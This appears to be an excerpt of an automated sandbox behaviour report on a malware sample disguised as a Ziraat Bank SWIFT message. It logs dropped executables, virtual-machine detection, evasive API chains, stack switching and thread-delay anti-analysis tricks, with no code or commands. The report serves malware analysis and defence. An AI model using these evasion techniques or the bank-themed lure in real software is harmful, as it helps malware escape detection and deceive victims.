Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\cmd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\wscript.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\wscript.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\wscript.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\bothsided\spadixes.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\bothsided\spadixes.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\bothsided\spadixes.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\bothsided\spadixes.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\bothsided\spadixes.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\bothsided\spadixes.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\bothsided\spadixes.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\bothsided\spadixes.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\TrojanAI.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\TrojanAI.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\TrojanAI.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\TrojanAI.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\TrojanAI.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\TrojanAI.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\TrojanAI.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\TrojanAI.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\TrojanAI.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\TrojanAI.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\TrojanAI.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\TrojanAI.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\TrojanAI.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\TrojanAI.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\TrojanAI.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe	Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion

Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)

Source: C:\Users\user\AppData\Local\Temp\neworigin.exe

WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration

Switches to a custom stack to bypass stack traces

Source: C:\Users\user\AppData\Local\bothsided\spadixes.exe	API/Special instruction interceptor: Address: 15D320C
Source: C:\Users\user\AppData\Local\bothsided\spadixes.exe	API/Special instruction interceptor: Address: 16A8C4C
Source: C:\Users\user\AppData\Local\bothsided\spadixes.exe	API/Special instruction interceptor: Address: EAAF5C
Source: C:\Users\user\AppData\Local\bothsided\spadixes.exe	API/Special instruction interceptor: Address: 11FEF84
Source: C:\Users\user\AppData\Local\bothsided\spadixes.exe	API/Special instruction interceptor: Address: D1824C

Source: C:\Windows\SysWOW64\svchost.exe	Memory allocated: 5B90000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Memory allocated: 5F00000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Memory allocated: 7F00000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\TrojanAI.exe	Memory allocated: FD0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\TrojanAI.exe	Memory allocated: 2960000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\TrojanAI.exe	Memory allocated: 4960000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\server02.exe	Memory allocated: EE0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\server02.exe	Memory allocated: 2870000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\server02.exe	Memory allocated: EE0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Memory allocated: 2560000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Memory allocated: 2610000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Memory allocated: 2560000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe	Memory allocated: 1850000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe	Memory allocated: 3350000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe	Memory allocated: 30A0000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe	Memory allocated: 16A0000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe	Memory allocated: 30E0000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe	Memory allocated: 50E0000 memory reserve \| memory write watch
Source: C:\Windows\SysWOW64\svchost.exe	Memory allocated: 5BD0000 memory reserve \| memory write watch
Source: C:\Windows\SysWOW64\svchost.exe	Memory allocated: 6200000 memory reserve \| memory write watch
Source: C:\Windows\SysWOW64\svchost.exe	Memory allocated: 8200000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Local\Temp\TrojanAI.exe	Memory allocated: 21A0000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Local\Temp\TrojanAI.exe	Memory allocated: 23E0000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Local\Temp\TrojanAI.exe	Memory allocated: 2200000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe	Memory allocated: 1240000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe	Memory allocated: 2E30000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe	Memory allocated: 4E30000 memory reserve \| memory write watch

Source: C:\Windows\SysWOW64\svchost.exe

Code function: 5_2_004019F0 OleInitialize,_getenv,GetCurrentProcessId,CreateToolhelp32Snapshot,Module32First,CloseHandle,Module32Next,Module32Next,CloseHandle,GetModuleHandleA,FindResourceA,LoadResource,LockResource,SizeofResource,_malloc,_memset,SizeofResource,_memset,FreeResource,_malloc,SizeofResource,_memset,LoadLibraryA,GetProcAddress,VariantInit,VariantInit,VariantInit,SafeArrayCreate,SafeArrayAccessData,SafeArrayUnaccessData,SafeArrayDestroy,SafeArrayCreateVector,VariantClear,VariantClear,VariantClear,

5_2_004019F0

Source: C:\Windows\SysWOW64\svchost.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\TrojanAI.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\svchost.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\Temp\TrojanAI.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe	Thread delayed: delay time: 922337203685477

Source: C:\Windows\System32\wscript.exe

Window found: window name: WSH-Timer

Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Window / User API: threadDelayed 3422	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Window / User API: threadDelayed 6379	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 7994
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 1615
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe	Window / User API: threadDelayed 5165
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe	Window / User API: threadDelayed 4623

Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift_Mesaji_BXB04958T.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\bothsided\spadixes.exe	Jump to dropped file
Source: C:\Windows\SysWOW64\svchost.exe	Dropped PE file which has not been started: C:\Windows\System32\alg.exe	Jump to dropped file
Source: C:\Windows\SysWOW64\svchost.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\Ziraat_Bankasi_Swift_Mesaji_BXB04958T.exe	Jump to dropped file

Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift_Mesaji_BXB04958T.exe	Evaded block: after key decision			graph_0-54111
Source: C:\Users\user\AppData\Local\bothsided\spadixes.exe	Evaded block: after key decision			graph_2-55166

Source: C:\Users\user\AppData\Local\bothsided\spadixes.exe	Evasive API call chain: GetSystemTimeAsFileTime,DecisionNodes			graph_2-55022
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift_Mesaji_BXB04958T.exe	Evasive API call chain: GetSystemTimeAsFileTime,DecisionNodes			graph_0-55006

Source: C:\Windows\SysWOW64\svchost.exe	Evasive API call chain: GetModuleFileName,DecisionNodes,Sleep
Source: C:\Windows\SysWOW64\svchost.exe	Evasive API call chain: GetModuleFileName,DecisionNodes,ExitProcess

Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift_Mesaji_BXB04958T.exe	API coverage: 5.0 %
Source: C:\Users\user\AppData\Local\bothsided\spadixes.exe	API coverage: 5.7 %

Source: C:\Windows\SysWOW64\svchost.exe TID: 6988	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\TrojanAI.exe TID: 5940	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 7388	Thread sleep time: -35048813740048126s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 7388	Thread sleep time: -100000s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 7388	Thread sleep time: -99890s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 7388	Thread sleep time: -99780s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 7388	Thread sleep time: -99671s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 7388	Thread sleep time: -99562s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 7388	Thread sleep time: -99452s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 7388	Thread sleep time: -99343s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 7388	Thread sleep time: -99230s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 7388	Thread sleep time: -99080s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 7388	Thread sleep time: -98888s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 7388	Thread sleep time: -98636s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 7388	Thread sleep time: -98062s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 7388	Thread sleep time: -97640s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 7388	Thread sleep time: -97500s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 7388	Thread sleep time: -97374s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 7388	Thread sleep time: -97265s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 7388	Thread sleep time: -97145s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 7388	Thread sleep time: -97015s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 7388	Thread sleep time: -96888s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 7388	Thread sleep time: -96780s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 7388	Thread sleep time: -96661s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 7388	Thread sleep time: -96546s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 7388	Thread sleep time: -96437s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 7388	Thread sleep time: -96328s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 7388	Thread sleep time: -96218s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 7388	Thread sleep time: -96109s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 7388	Thread sleep time: -96000s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 7388	Thread sleep time: -95890s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 7388	Thread sleep time: -95781s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 7388	Thread sleep time: -95671s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 7388	Thread sleep time: -95558s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 7388	Thread sleep time: -95453s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 7388	Thread sleep time: -95266s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 7388	Thread sleep time: -95106s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 7388	Thread sleep time: -94873s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 7388	Thread sleep time: -94317s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 7388	Thread sleep time: -94184s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 7388	Thread sleep time: -94078s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 7388	Thread sleep time: -93968s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 7388	Thread sleep time: -93859s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 7388	Thread sleep time: -93749s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 7388	Thread sleep time: -93640s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 7388	Thread sleep time: -93531s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 7388	Thread sleep time: -93421s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 7388	Thread sleep time: -93312s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 7388	Thread sleep time: -99874s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 7388	Thread sleep time: -99766s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 7388	Thread sleep time: -99632s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 7388	Thread sleep time: -99530s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 7388	Thread sleep time: -99422s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 7388	Thread sleep time: -99312s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 7388	Thread sleep time: -99203s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 7388	Thread sleep time: -99094s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 7388	Thread sleep time: -98969s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 7388	Thread sleep time: -98860s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 7388	Thread sleep time: -98735s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7260	Thread sleep count: 7994 > 30
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7244	Thread sleep count: 1615 > 30
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7424	Thread sleep time: -7378697629483816s >= -30000s
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe TID: 7420	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe TID: 7472	Thread sleep time: -309900000s >= -30000s
